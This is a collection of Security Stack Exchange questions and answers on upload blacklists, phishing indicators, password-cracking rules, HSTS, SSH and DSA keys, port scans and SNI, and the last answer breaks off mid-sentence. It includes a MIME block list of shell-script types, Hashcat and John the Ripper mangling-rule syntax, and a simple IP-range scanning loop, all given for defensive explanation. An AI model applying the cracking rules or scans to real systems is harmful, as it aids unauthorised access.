I'm working in a PHP system where the user can upload files. I'm trying to protect the system from malicious codes, so I'm thinking about some type of blacklist of files that I've to block from upload. I know that a Whitelist is better than a Blacklist and this is my common approach, but in this case I need to do a blacklist of files for many reasons (out of my control), but I still looking for safety (if possible). This is my current script (I'm checking the MIME type to get the file type): $finfo = finfo_open(FILEINFO_MIME_TYPE); $check= finfo_file($finfo,$file["tmp_name"]); finfo_close($finfo); $dangerMime = array('application/x-bsh', 'application/x-sh', 'application/x-shar', 'text/x-script.sh'); if (in_array($check, $dangerMime)) { //block upload } else { //allow upload } The current list of MIME types to block is: 'application/x-bsh', 'application/x-sh', 'application/x-shar', 'text/x-script.sh' I'm trying to block any .sh file, since the system is running in a CentOS under Apache. Are there any other filetype that I also should block? Following are some importante information: The Server is a CentOS 7.2 with Apache 2.4.6. Following are the permissions of the uploads directory: drwxr-xr-x 4 apache apache 4096 Jan 8 12:23 uploads Note: In this project, I'm acting just as developer, so I can't change the file permissions.
It is not clear from your description why you want block these files exactly. I see the following possibilities: You want to block files that might infect the server itself. Unfortunately this can be about anything: shell, perl, python, awk, ... and of course compiled binaries. But to get these files executed without explicitly calling them with an interpreter the executable bit must be set, which should not be the case if the file gets uploaded from inside a web application. This is at least the case on UNIX systems, because on Windows the extension is enough and there you have also PoweShell, JavaScript, Batch and all the other files. Still, something must at least trigger the execution of the file or have the upload directory in the path for DLL's and shared libraries. Or you want to block files which might be executed by the web server itself, i.e. from inside the web application. These are PHP, ASP, CGI ... files which will be executed via a URL and cause harm for the user or for the server. Of course the only works if your upload directory is reachable by a URL or if the attacker manages to break out of the upload directory with path traversal attacks or similar or if the attacker manages some server side code to include these files (i.e. local file inclusion attack). Or you want to block files which might be included to serve malware to the user, i.e. corrupt PDF documents, javascript redirecting to malware sites. In this case you have probably a upload directory which is reachable by a URL because you want users to download these files. Unfortunately for such files not only the file type you see is important but also the context in which they are called (i.e. as image, script, css, object ...) and you are not able to control this usage. ... but in this case I need to do a blacklist of files for many reasons, Since you obviously don't know which files can be dangerous at all such kind of blacklist will not work, ever. There will always be file types you miss or the attacker will hide its file behind some other type, i.e. construct a polyglot .
{ "source": [ "https://security.stackexchange.com/questions/112319", "https://security.stackexchange.com", "https://security.stackexchange.com/users/83205/" ] }
112,383
I was reading the security advice given by the Swedish Bankers' Association . They included these two pieces of advice (my translation), that I assume is to teach the user to check for SSL/TLS and protect from SSL-strip: Check that it is the address of your bank in the address bar of your browser before you log on to your internet bank. The web address on the log on page should start with https:// and a padlock symbol should be visible in the browser. This is a fairly important topic, since some Swedish banks serve their main page (where the link to the internet bank is) over HTTP, and none of them have implemented HSTS. However, I see a number of problems with the advice given: How do I check that it is the adress of my bank? An ordinary user would probably go scanning the URL for the name of the bank, and be satisfied when they find it. So armed only with this advice you would easily fall for mybank.com.evil.com/mybank.com . (Unfortunately the URL for logon pages are often not very clean, so customers would expect a messy URL.) "So I remember there was something with an h and a couple of p or t or something I should look for. http:// ? Yeah, that was probably it. Must be safe." Look for the padlock in the browser ? Seriously? You can just include it in the page, don't even need to use the old favicon trick to fool someone reading this advice. Naturally I started to think about what some actual good advice would be to give on this subject, but I found it surprisingly hard. The advice should be (A) short, (B) easy to remember and understand even for a user with little technical knowledge, and (C) apply to all fairly modern browsers. Imagine you have 30 seconds to explain this to a not very-tech savvy relative. Any suggestions?
Update 09/2018: While I previously stated that this might be a good option, the world has changed, and the use of EV is no longer a particularly reliable indicator, even given the drawbacks mentioned below. There are articles such as this one from Troy Hunt which explain the full issue, but, in short, browsers are no longer treating EV certificates as something particularly special, and are hiding or reducing the indicators of EV status. Taking the first of the sites shown previously, for instance, gives the following display in, respectively, Chrome 69, Edge, Firefox 62 and Internet Explorer 10. Safari on mobile shows a green padlock and "Barclays PLC", Chrome on mobile shows a green padlock, "https" in green, then the rest of the URL in black. In other words, even if the site does use an EV certificate, there isn't a single indicator that can be easily communicated to a non-technical person anymore. It was always at the mercy of browsers, and it's no longer treated as anything special. So, what's the alternative? Nothing springs to mind: the URLs below are from a range of subdomains of the bank sites, which makes looking for the bank name harder, and it doesn't work on some mobile devices, which don't show the full URL. The padlock symbol is easy to work around, given the availability of free SSL certificates for domains you control. Browsers mostly currently show "https://", but not "http://" now, but relying on that remaining the case has most of the same issues as relying on the green address bar. That leaves typing the bank address into the address bar each time, and being absolutely sure it's not got typos in, which is not a reliable method either. Searching isn't reliable: most search providers are pretty good at weeding out fake links in adverts on terms like "online banking login", but it only takes one missed link. Following links from the main bank site just moves the verification issue up one level. I suppose it's down to just being careful: use a single device to access the banking site, using a bookmark which has been checked carefully on creation, and don't allow anyone else to access that device, so they can't be modified. It probably makes sense for some people, but I could see that being a too high burden on the average user, where devices are shared with family members or could be accessed by co-workers. Original 02/2016: I was going to suggest that ensuring that the login screen for the online banking system showed the name of the bank in green, in the address bar might work. But then I started wondering if any of the local banks I know about did that properly. It's less encouraging than I'd hoped. For these nine fairly large banks, 6 provide the name of the bank in the EV cert bar. 2 provide the name of the parent group (which might not always be obvious), and one doesn't even have an EV certificate. The EV certificate is designed to make this easy, if it's used properly - you can't fake it easily, and it's outside the page area, so can't be inserted by a malicious actor. However, it seems that banks aren't doing so well at using it..
{ "source": [ "https://security.stackexchange.com/questions/112383", "https://security.stackexchange.com", "https://security.stackexchange.com/users/98538/" ] }
112,425
If I type my password twice (like: PwdThingPwdThing ), OR type every character twice (like: PPwwddTThhiinngg ) will that make it substantially more secure than it already is? Assume that it is already 8 or 9 characters, consisting of upper and lower case, digits and one or more special characters. (Also assume that I didn't tell anyone that I am doing it this way, although I just told the world... Doh!) I ask because I would like more security in a way that I can still remember, and this would be an easy change to make and recall.
Let's try skipping theory and going straight to practice. Will typing the same word twice (or N times) substantially help? John the Ripper Jumbo has a variety of "simple rules" about this d duplicate: "Fred" -> "FredFred" f reflect: "Fred" -> "FredderF" oclHashcat rules based attack has simple rules just for this, too d Duplicate entire word d p@ssW0rd p@ssW0rdp@ssW0rd pN Append duplicated word N times p2 p@ssW0rd p@ssW0rdp@ssW0rdp@ssW0rd Reflect f Duplicate word reversed f p@ssW0rd p@ssW0rddr0Wss@p Therefore, no, this bit of cleverness is so common it's included explicitly in both common rulesets already for use by itself, or in combination with other rules. OR type every character twice John the Ripper Jumbo has an example specifically about this in the documentation XNMI extract substring NM from memory and insert into current word at I is the core rule "<4X011X113X215" (duplicate every character in a short word) is the example in the documentation to cover exactly your case for short passwords . oclHashcat rules based attack has simple rules just for these kinds of attacks q Duplicate every character q p@ssW0rd pp@@ssssWW00rrdd zN Duplicates first character N times z2 p@ssW0rd ppp@ssW0rd ZN Duplicates last character N times Z2 p@ssW0rd p@ssW0rddd XNMI Insert substring of length M starting from position N of word saved to memory at position I lMX428 p@ssW0rd p@ssw0rdw0 Therefore, no, again, this is such a common bit of cleverness that it's called out explicitly in both major open source cracking products. Assume that it is already 8 or 9 characters, consisting of upper and lower case, digits and one or more special characters. The other rules in those products very likely cover everything you're doing already, and it's also likely that whatever combination you have is already included in a ruleset applied to a reasonable cracking wordlist. oclHashcat alone comes with twenty five different files full of .rules, including d3ad0ne.rule with more than 35,000 rules, dive.rule with over 120,000 rules, and so on. a large number of wordlists are available, some of which may include your exact password - the Openwall wordlist alone has a single 500MB file of more than 40 million words including mangled ones and I'm personally aware of both small, very good wordlists (phpbb, et all) and huge, comprehensive wordlists with literally billions of entries, taking up many gigabytes of space total. As with everyone else, you need to use try randomness or something like an entire sentence worth of personal anecdote that does NOT use words in a top 5000 list of common English words, and does use long, uncommon words (to force combinatorial attacks using much larger dictionaries). Specifically look, for example, for words selected at (good) random included in Ubuntu's insane english ispell dictionary list that are not included in the standard english ispell dictionary, for example.
{ "source": [ "https://security.stackexchange.com/questions/112425", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
112,493
Suppose that my site is located at foo.example.com and I send the following HTTP header when visitors accessing my site using HTTPS: Strict-Transport-Security: max-age=31536000; includeSubDomains Would the HSTS policy have any effect on domains such as example.com or bar.example.com ? I'm not in charge of the certificates but the common name is *.example.com on the certificate so I'm not sure if that matters. The certificate isn't valid for abc.foo.example.com , but I imagine that if there is a valid cert for such a host that the HSTS policy would apply there.
Based on the RFC, HTTP Strict Transport Security (HSTS) , the includeSubDomains states: 6.1.2. The includeSubDomains Directive The OPTIONAL "includeSubDomains" directive is a valueless directive which, if present (i.e., it is "asserted"), signals the UA that the HSTS Policy applies to this HSTS Host as well as any subdomains of the host's domain name. Therefore your HSTS policy would only apply to foo.example.com and *.foo.example.com example.com and bar.example.com would not be impacted. For more info, there is a great thread on webmasters titled Do I need a wildcard SSL certificate for inclusion in the HSTS preload list?
{ "source": [ "https://security.stackexchange.com/questions/112493", "https://security.stackexchange.com", "https://security.stackexchange.com/users/28137/" ] }
112,510
When running a public web server (e.g., with Apache), I've heard it's recommended to bind SSH to a second IP address, different from the one Apache is listening to. But for me it seems like this is only a matter of obfuscation - once an attacker knows the second IP address, the situation would be the same as with a single IP address. Am I right? Or are there any other benefits of using a second IP address except for obfuscation?
Unless that IP address belongs to a dedicated management network which implements additional security, it is a waste of resources. Both IPs are, obviously, ending up on the same server. This means that, unless they come in through different networks (i.e. a management network that implements additional protection), there will be no difference locally between a connection to SSH going on one IP or the other: you can firewall these exactly in the same way (if you want) and it doesn't make any more or less obvious in the logs. The only thing you're "hiding" is the relation between the SSH server and the web server and, unless you have very poor procedure for picking up account names, then it shouldn't matter. If you're using a dedicated management network, however, it's a different matter: such a network could require all connections to go though a secure authentication phase and impose extra limitation on the conneting party (for instance, you can require them to be physically connected to the network, or go through a VPN requiring 2FA and making sure your client is "clean").
{ "source": [ "https://security.stackexchange.com/questions/112510", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99007/" ] }
112,528
I've heard multiple multiple times to never leave SSH with a password open over the internet. Why is this so bad? I understand the password can be bruteforced, but what if it is a very strong password that would takes eons to crack? Are there more things to consider than just bruteforce or am I missing anything else?
Why is this so bad? Because there are tons of bots just scanning the web for open ports and trying to log in, once a scanner bot finds an open SSH port it may be queued for another bot (or botnet) to try to brute force the password. One of the risks here is that eventually, they may succeed in figuring out the password and take control of the server. I understand the password can be bruteforced, but what if it is a very strong password that would takes eons to crack? Having a long password is a mitigation technique, however the resources (bandwidth, disk space used for logs and CPU for example) consumption of a brute-force attack can also be damaging. Mitigation Some techniques to mitigate a brute-force attack on SSH: Use a different port, don't get a false sense of security with this, but many bots do search for 22 exclusively. ( Related question ) Disable SSH passwords Require a private key for logging in Throttle connections Implement an IPS ( Fail2ban and Snort come to mind) Restrict login per IP address Restrict which users can log in (different than checking the IP address)
{ "source": [ "https://security.stackexchange.com/questions/112528", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99025/" ] }
112,545
What are the main advantages of using LibreSSL vs OpenSSL ? As I understood LibreSSL is a fork of OpenSSL: LibreSSL is a version of the TLS/crypto stack forked from OpenSSL in 2014, with goals of modernizing the codebase, improving security, and applying best practice development processes. Seems like a good idea to use it. Is it this library widely used? Why would server administrators choose LibreSSL over OpenSSL?
There is a very extensive article at Wikipedia and it does not make sense to reiterate everything here. But to give you some highlights: It replaces OpenSSL on OpenBSD, OS X since 10.11 and on some other systems. It started with throwing away lots of stuff which was considered useless for the target platforms or insecure by design and it also added some more secure defaults. The result of this is that from the 6 critical vulnerabilities in OpenSSL since the fork none affected LibreSSL. Why would server administrators choose LibreSSL over OpenSSL? If anybody cares about security or wants to better sleep at night and not care about the next OpenSSL vulnerability the choice should be clear.
{ "source": [ "https://security.stackexchange.com/questions/112545", "https://security.stackexchange.com", "https://security.stackexchange.com/users/57364/" ] }
112,563
So, I am designing a door authentication system (can't really go into more detail) for our school, so that only authenticated persons can go through a certain internal door. They hold that its inner working should be kept a secret, so that no one can reverse engineer it. I maintain that this would be Security through obscurity , which is bad. I have designed the system such that knowing how it works wouldn't help you get in, only having the key would help you get in, as according to Kerckhoff's principle . They still maintain that instead of more people knowing about it, less should. Is it a good idea to go with a closed design? If not, exactly why? P.S. They only told me it was a secret after I had designed most of it and told a bunch of people, if that makes a difference (I had no idea they wanted it to be a secret). P.P.S. Although it is not open to the outside, the room it is protecting contains more valuable stuff than the rest of the school, so I would expect adversaries to be able to reverse engineer it anyways if we go with a closed design instead of an open one, but I'm not sure how to communicate that.
Obscurity isn't a bad security measure to have in place. Relying upon obscurity, as your sole or most substantial security measure, is more or less a cardinal sin. Kerckhoff's Principle is perhaps the most oft-cited argument against implementing security through obscurity. However, if the system is already properly secure according to that principle, this is mis-guided. The principle, paraphrased, says "assume the enemy knows everything about the design of your security systems". This does not in any way imply "tell the enemy everything about your system, because they know anyway". If the system is already well-designed according to Kerckhoff's Principle, the worst that can be said about applying security through obscurity to it is that it adds little to no value. At the same time, for such a system, there is equally little to no harm in protecting the confidentiality of its design.
{ "source": [ "https://security.stackexchange.com/questions/112563", "https://security.stackexchange.com", "https://security.stackexchange.com/users/56579/" ] }
112,696
I work from home. Why would a company I am about to do some work for ask for my IP address? What would they need it for? Should I be worried? Thanks
This seems to be a persistent question. IP addresses aren't secrets. Every website you go to must know your IP address. There's no reason to not give away your IP address. Many companies have firewalls that only allow certain addresses through to certain ports. This is a relatively common way of controlling access to resources with minimal effort. However, most people don't have static IP addresses at home, and your IP address can suddenly change without notice. So just be aware that the IP you have today might not be the IP you have tomorrow.
{ "source": [ "https://security.stackexchange.com/questions/112696", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99207/" ] }
112,768
I have locally made a Root CA certificate. I used the CA cert to sign the IA cert and used the IA cert to sign the server certificate. When I try to access the local server which uses the server certificate, it gives me a security risk warning. Is there a way to make it not give the warning? All I basically want to know is, is it possible to make self signed certificate trusted?
You need to import the root certificate into the trust store for the browser. Once the browser knows you trust this root certificate, all certificates signed by this will show up as trusted. Note that this will only make the connection trusted for you, any others who don't have the root certificate installed will still receive an error.
{ "source": [ "https://security.stackexchange.com/questions/112768", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99297/" ] }
112,786
Lately I've been reading about things like BadUSB and RubberDucky which are essentially USB sticks that tell the computer they are a keyboard. Once they are plugged in they "type in" whatever commands they were told to execute. My question is, why are keyboards automatically trusted in almost every OS? For example, if an OS detects a new keyboard plugged in, why not pop up a password prompt and disallow that keyboard from doing anything until it enters the password? It doesn't seem like this would create a ton of usability issues. Is there a reason why this or another protection measure isn't used?
The trust model for a device you plug in to your computer is just inherently difficult. The USB standard was created to allow literally anyone to create a USB device. Security wasn't a factor. Even if it was, where do you place the trust? The movie industry tried this model with HDMI, and it's essentially failed miserably. You can't simultaneously give someone a device that does something, and prevent them from understanding how to do the same thing. Your example proposes to put the trust in the user. The most obvious problem is nobody wants to type in passwords just to use a keyboard. Barring that, would it really solve anything? The user already trusts the device, otherwise they wouldn't be plugging it into their computer. Since trust has already been established, why wouldn't they simply do whatever is required to get it to work?
{ "source": [ "https://security.stackexchange.com/questions/112786", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99312/" ] }
112,802
There was a question RSA vs. DSA for SSH authentication keys asking which key is better. Basically all answers were more in a favour of RSA over DSA but didn't really tell that DSA would be somehow insecure. Now however DSA was deprecated by OpenSSH and is later going to be entirely dropped: https://www.gentoo.org/support/news-items/2015-08-13-openssh-weak-keys.html The information states: Starting with the 7.0 release of OpenSSH, support for ssh-dss keys has been disabled by default at runtime due to their inherit weakness. If you rely on these key types, you will have to take corrective action or risk being locked out. Your best option is to generate new keys using strong algos such as rsa or ecdsa or ed25519. RSA keys will give you the greatest portability with other clients/servers while ed25519 will get you the best security with OpenSSH. What makes DSA keys inherently weak?
This is a good question. The dedicated page from OpenSSH only says: OpenSSH 7.0 and greater similarly disables the ssh-dss (DSA) public key algorithm. It too is weak and we recommend against its use. which is no more detailed than the "inherit weakness" from the announce. I did not find any published explanation about these weaknesses except some unsubstantiated weaselling that talks of "recent discoveries". Thus, it is time for some sleuthing. In the source code of OpenSSH-6.9p1 (Ubuntu 15.10 package), for the key generation tool ssh-keygen , I find this remarkable bit of code: maxbits = (type == KEY_DSA) ? OPENSSL_DSA_MAX_MODULUS_BITS : OPENSSL_RSA_MAX_MODULUS_BITS; if (*bitsp > maxbits) fatal("key bits exceeds maximum %d", maxbits); if (type == KEY_DSA && *bitsp != 1024) fatal("DSA keys must be 1024 bits"); The OPENSSL_DSA_MAX_MODULUS_BITS is a constant from OpenSSL's headers, that define it to 10000. So the first four lines check that the requested key size, at generation time, can actually be handled by the key generation process. However, the next two lines basically say: "regardless of the test above, if the key is DSA and the size is not 1024, niet." These 6 lines are, in themselves, a sure sign that whoever developed that code did not completely agree with himself with regards to key sizes. This code was probably assembled incrementally and possibly by different people. The source of the "1024" can be traced to the actual DSA standard (called "DSS" as "Digital Signature Standard"), FIPS 186-4 . That standard was revised several times. In its first version, DSA was mandated to use a modulus whose size was between 512 and 1024 bits (and should be a multiple of 64, presumably to simplify the task for implementers). A later version acknowledged the increases in technological power and mathematical advances, and banned any size other than 1024 bits. The modern version of FIPS 186 (the fourth revision, as of early 2016) allows the modulus to have size 1024, 2048 or 3072 bits. It can thus be surmised that ssh-keygen refuses to use a modulus size different from 1024 bits because someone, at some point, read the then-current FIPS 186 version that mandated exactly that, and nobody bothered to update ssh-keygen when the FIPS standard was amended. Regardless of how this spectacular piece of programming schizophrenia came to be, the raw result is that most if not all SSH keys of type DSA in use today rely on a 1024-bit modulus. The next piece of the puzzle is the Logjam attack . Logjam is basically about noticing that when a client and server agree to use weak crypto, they can be attacked. This is an attack on SSL/TLS, not SSH. However, the Logjam article does not stop at (rightfully) bashing SSL/TLS implementations for using a 512-bit modulus for DH; it also dedicates some talking space to "state-level adversaries". That part mostly says something which was already known, i.e. that breaking discrete logarithm modulo a 1024-bit modulus (something which would allow breaking both DH and DSA) is right now horrifyingly expensive, but not impossible with regards to our current knowledge of the problem and available technology (similar to breaking RSA-1024, and quite unlike breaking a 2048-bit DH or DSA, which are beyond the feasible with current Earth resources). To receptive ears, this all sounded like "OMG we are all pirated by the NSA !" and the publicity around the Logjam issue (which is very real) trailed in its wake a substantial amount of hysteria on the subject of 1024-bit DSA keys, included when they are used in SSH. An extra point was that using DSA requires generating, for each signature , a new random value, and the quality of the generation of that value is of paramount importance. Some implementations have failed spectacularly, leading to private key leakage (notably for some "Bitcoin wallets"). This characteristic of DSA is shared with its elliptic-curve version ECDSA. It can be fixed . But it instilled the idea that DSA signatures can be tricky to do properly (and ECDSA signatures equally, but elliptic curves are cool and nobody wants to ban them). These parameters, taken all together, explain the ban. This can be viewed as a case of OpenSSH developers being proactive in their notion of security and are ready to force users to use strong crypto. Another way of seeing the very same sequence of decisions is that OpenSSH developers blundered badly at some point because of some poor reading of FIPS 186, and then sought to cover it in the equivalent of dumping at sea the corpse of the inconvenient husband. Note that breaking your DSA key would allow the attacker to impersonate you, but not to decrypt recorded sessions. While it can be said that switching to an ECDSA key would be a good idea at some point (it saves a bit of bandwidth and CPU), there is no cryptanalytic urgency to do so. You will still have to do it, because otherwise you may be locked out of your servers because some packager was too zealous in the deprecation policy.
{ "source": [ "https://security.stackexchange.com/questions/112802", "https://security.stackexchange.com", "https://security.stackexchange.com/users/34120/" ] }
112,851
Is there an encryption algorithm that is completely secure and isn't based on difficult computational algorithms? If such an algorithm exists, why we don't we use it in SSL / SSH ?
Yes, it's called One Time Pad , and we don't use it in SSL/TLS because key-exchange is problematic at scale. I will point out that with the rapid decline in the price of various types of storage, One Time Pad's use for smaller communications such as e-mails is more practical now than it ever has been simply because the cost of giving someone something like a large USB Flash Drive with a large "pad" on it didn't exist in a practical sense a few years ago. Still, as the price approaches zero, this becomes trivial to do. As storage costs continue to approach zero, this could become more useful for a wide variety of uses in the future, but the key-exchange problem will still exist.
{ "source": [ "https://security.stackexchange.com/questions/112851", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99334/" ] }
112,905
cnet.com says: Even in Snowden's room, the group took precautions not to be overheard. Greenwald and Poitras would remove the batteries from their mobile phones and put them in refrigerator of Snowden's minibar (...) Is there any security reason they would do that?
With its insulated walls and rubber door seals, a refrigerator is the most soundproof box commonly found in ordinary living spaces. If it's running, even better, it provides white noise. If one was worried about listening devices, then a fridge would be a reasonable and available place to stash them. And Snowden has alleged the NSA can do lots of things even with a phone that's turned off . Minor update: Out of curiosity, I put my phone in the fridge, and later in the freezer, with batteries still inserted. In both cases I was able to call it quite easily - the refrigerator did not act as a Faraday cage - but the ringtone volume was noticeably subdued. So I do think the fridge in the quoted story was a soundproofing issue, not a Faraday Cage as has been suggested. I know it's just an experiment of one, but it was a fun experiment :) Even more minor update: I was curious and checked... my microwave, which is a Faraday Cage, doesn't block cell signals either (good explanation here ).
{ "source": [ "https://security.stackexchange.com/questions/112905", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15648/" ] }
113,064
I sometimes like to check spam just to see how the messages look like, and I found someone who actually put an American phone number (1-XXX-XXX-XXXX). Most of these spammers are either trying to get money out of you, or hack you in ways like disguising as services like Google+. Not that I actually want to, but I am curious if calling the number would do something to my phone. How could a hacker possibly access sensitive information just by tricking someone into calling. I have heard (no idea where), that some numbers when called, will charge you an enormous bill. Could this be true?
Can you get "hacked" by calling a number? I am curious if calling the number would do something to my phone. How could a hacker possibly access sensitive information just by tricking someone into calling. It could be a hack, or it could be a prelude to a hack. Here are some rough examples: If you call them, the spammer can find out if that phone number is owned by an actual person. The spammer can also easily fake the same area code as you, and set up a clever social engineering trick that may involve you thinking with the wrong head. If you're dumb enough to call them, you may be gullible enough to fork over additional information. If you're dumb enough, they may call you from other numbers, or forward you to another number. There may also be an exploit in your phone's processing of various messages/content types. While they could easily target all phones at once by using some form of auto-messaging feature, this may be easily stopped by carriers. Learning more about you allows an attacker to guess secret answers, passwords, etc. If you're the gullible type, chances are you don't have a good password policy, or you could be tricked into visiting a malicious website, or both. But why not just send infected videos or pictures to everyone? Let's assume the spammer has developed, or found, a program that helps with automatically dialing phone numbers. If they're sending an infected video or picture to multiple recipients, they may quickly run out of data. It's far cheaper and easier to target people individually, especially those gullible enough to call the number. In fact, if they target everyone, then that also increases the chance of their scam becoming well-known. By limiting their attacks only to the gullible, they've found a very good way to limit detection and knowledge of their particular scam. The reason why they'd want to limit knowledge is that many folks may be searching for a particular scam, not exactly their specific scam. This is a problem with many gullible people: they can't really think outside the box, and not realize it's the same type of scam, but with different features. Your information helps scammers engage in Social Engineering tactics Have you ever tried to contact customer service for anything important, such as banks, online game accounts, websites, etc? Usually, they need specific information from you, or someone pretending to be you, in order to handle your request. In fact, just recently, I was able to social-engineer a customer service representative for an account of mine by providing details on things I knew about me, without actually providing any real concrete details, or even providing my identity. All I needed was a few bits of information about myself. Social Engineering is a tactic used everywhere, and often results in astounding success because people in general are ill-equipped to handle it. If a spammer has your phone number, then it may be possible for them to get other information. Maybe your phone number is tied to different accounts. Maybe they have a partial database of credentials stolen from various websites, which could include more information on you. Maybe that database includes information on your email address , which will allow the scammer to continue their campaign of phishing without you realizing it. Can calling spam numbers cost me money? I have heard (no idea where), that some numbers when called, will charge you an enormous bill. Could this be true? Yes, this is possible. If you're calling a premium-rate telephone number , then that could cost you a lot of money when you call them. If you text a number associated with a "donation", whether it's legitimate or a scam, your phone bill will likely include additional charges.
{ "source": [ "https://security.stackexchange.com/questions/113064", "https://security.stackexchange.com", "https://security.stackexchange.com/users/67251/" ] }
113,109
I currently run an Apache HTTP server, and have set up monitoring to receive emails whenever an error appears in the error logs. I get the usual trying to find if I'm using HTTP 1.0 and trying to see if I'm using off the shelf software like WordPress that can be exploited. Over the weekend I saw a new entry in my error logs and was wondering what the potential exploiter was trying to do (Abcdef is i'm guessing the exploiters handle (I have changed)): :[DATE] [error] [client XXX.XXX.XXX.XXX] Invalid URI in request HEAD towards the green fields outside. Watch the goats chewing the grass. What is the meaning of life? Life isn't about getting to the end. Goats know this. You should know too. Goats are wise. Goats are cute. Listen to them! This is the message. Love goats, love the Internet! \xf0\x9f\x90\x90 Abcdef. HTTP/1.0 Now apart from obviously telling me about their love for goats, can anyone determine was the aim of this request was. I tried to google part of the string.. and just ended up with results about goats! I guess that the idea was to provide a URI which would cause an overflow resulting in something do with the unicode at the end, but am unsure. NOTE I have made the giant assumption that the request did have nefarious means due to the chars at the end of the request, hence posting in Security rather than Server Fault.
I don't know what the REDACTED part consisted of, but I can tell you that the bytes \xf0\x9f\x90\x90 correspond to a picture of a goat in UTF-8 : Here it is: Note: On a whim, I also looked up the Intel opcodes corresponding to these byte values. They don't do anything interesting at all — 0x90 is NOP (does nothing), 0x9f is LAHF (load FLAGS into AH register), and 0xf0 is LOCK (which will raise an illegal instruction error when followed by LAHF).
{ "source": [ "https://security.stackexchange.com/questions/113109", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99675/" ] }
113,127
My phone number is 456-123-XXXX (American phone number + area code). Over the past few months I get fairly regular spam calls from other numbers also beginning with 456-123-XXXX, where the last four digits are always different. The calls are clearly spam, telling me I won a trip and then asking for my credit card number. After getting one such call, I ignored it and called the number back. The guy that answered seemed genuinely confused and said he hadn't called me. I warned him that his number was likely being used for spam. I've already called my carrier, but the operator who answered seemed totally confused and basically just suggested I change my number, which I really don't want to do. My number is attached to a cell phone, although when I originally got it 15 years ago it was a landline. So... what do I do? Also, I'm curious as to what's actually happening... as well as if my number is also being used to spam other people.
The telephone system has been designed so that a caller can replace their phone number with a fake, and some unscrupulous companies use this to change their number to appear to be local to the person they are calling. They aren't using specific numbers of people you know, just something picked at random. The thinking is that a person is more likely to pick up if they think it's a local call. It is illegal to spoof your number with intent to defraud in the US and Canada, so what they are doing is probably against the law. You could report this to the phone company and they may look into it. Other than that you can't do much about this unless your phone company offers an add-on service to prevent it.
{ "source": [ "https://security.stackexchange.com/questions/113127", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99688/" ] }
113,172
This morning I was looking through firewall logs and saw there were about 500 packets marked as port scan. The scanning range was from 1000-1200 5000-5200. The IP address is 85.25.217.47 which seems to be somewhere in Germany. And these guys continuously scan our ports on a regular basis. The packets were all dropped by the firewall (a Sophos SG125). What I normally do is I just add the IP range to our blocking list so next time it just drops them by a specific rule. How do you guys deal with port scan attacks?
I ignore them. And if you have a reasonable security posture, you should too. Your servers should have no ports open to the general public other than those that you use to serve the general public. For example, your web server should have open port 80, 443, and maybe 22; everything else should be SSH-tunneled or otherwise VPN'ed if you need to connect to it, unless you expect random nobodies on the Internet to be using the listening service. Perhaps you may want to remap SSH to port 222 or or something in the upper range to avoid filling your auth logs with failed logins, and that should be as exciting as your servers get. If instead the port scan is hitting your outbound corp gateway, then the scan should show zero ports open, because your corp gateway isn't a server. And you, like a wise IT admin, run all your servers elsewhere on the internet, not inside your corp network, for a whole raft of reasons I won't go into here. A port scan should reveal to the attacker nothing that they couldn't reasonably guess. And if this is not the case, then your problem isn't the port scan, it's the public secrets you're trying to hide by blocking port scans.
{ "source": [ "https://security.stackexchange.com/questions/113172", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99743/" ] }
113,267
I am researching if I can host multiple domains on one server through HTTPS but for each domain, I have a different certificate. In this case, I would need to know the domain of the incoming connection so in that first part of the SSL handshake, will it have the information I need to send back the correct certificate for that domain?
Yes, as long as the server and the clients support the Server-Name-Indication (or SNI) extension. This extension allows for virtual hosting for HTTPS, where you have multiple independent domains and certifications bound to a single IP address. Most clients these days do support SNI. The place where you might have issues is if you have older clients using platforms like Windows XP, old versions of Android, or Java 6.
{ "source": [ "https://security.stackexchange.com/questions/113267", "https://security.stackexchange.com", "https://security.stackexchange.com/users/18162/" ] }
113,288
In an answer to How do you deal with massive port scans? , user tylerl said: ... And you, like a wise IT admin, run all your servers elsewhere on the internet, not inside your corp network, for a whole raft of reasons I won't go into here As a not-so-wise IT admin, what reasons are these?
Having all your corporate servers in the same network is a bad idea because if one of the servers is compromised, the attacker can easily spread out to the others . Servers are often configured to be secure on the front end, but when it comes to servers communicating with each other, there are various ways to find vulnerabilities. Also the sensitivity of data is often not the same. While a web server is important for the availability, a database server often contains valuable customer data. Separating these is a good idea in any case. Specialized hosting providers for specific servers are mostly able to keep their servers more secure as well. Thanks to the internet, there is no reason not to separate servers, unless your application is so time dependent that for example database servers need to be accessed directly.
{ "source": [ "https://security.stackexchange.com/questions/113288", "https://security.stackexchange.com", "https://security.stackexchange.com/users/52211/" ] }
113,456
I've set up a site on Digital Ocean without a domain yet, so there is only the IP. Despite telling no-one of its existence or advertising it, I get hundreds of notices from fail2ban that various IP's are trying to hack my SSL port or are looking for PHP files. But how do they know that I do exist? Where do they get the IP from?
You can't hide your IP address on the internet. They aren't secret. Pretty much what @DeerHunter said. It's trivial to scan the entire internet. If they want, they can target all-known digital ocean droplets that are online. They can do this on a timer so that when you go offline, or online, it will just keep trying as those may be high-value targets that could become vulnerable at a moment's notice. Let me give you a very rough coding example. Let's pretend your IP address is 104.16.25.255 . Let's get the IP address of www.digitalocean.com so we can easily check for associated IP addresses. www.digitalocean.com returns 104.16.25.4 . Let's scan everything: 104.16.25.* Scanning is incredibly easy from a programming standpoint Let's assume we want to try and find all nearby associated IP addreses. Assume programs can handle numbers and patterns very well. Here's an example of an integer being incremented: i++; This increments the current value of i by 1 . Let's assume i starts off as 1 . After i++ , you'll get 2 . Check out this painfully simple loop: for (int i = 1; i < 256; i++) { scanIpAddress("104.16.25." + i); } An alternative one-line bash variant would be as follows: for ip in `seq 1 255`; do scan_thingy_command 192.168.0.$ip --options -oG lol.txt; done You just scanned 104.16.25.1 , and changed i from 0 to 1 . As the whole loop continues, it will go from 104.16.25.0 to 104.16.25.255 . I don't have time to scan and look right now, however, it's possible that this tiny block doesn't just belong to digitalocean . To find more targets on DigitalOcean, a programmer may change the numbers even more. For example, introduce another loop that nests the aforementioned loop on the inside, and add j : 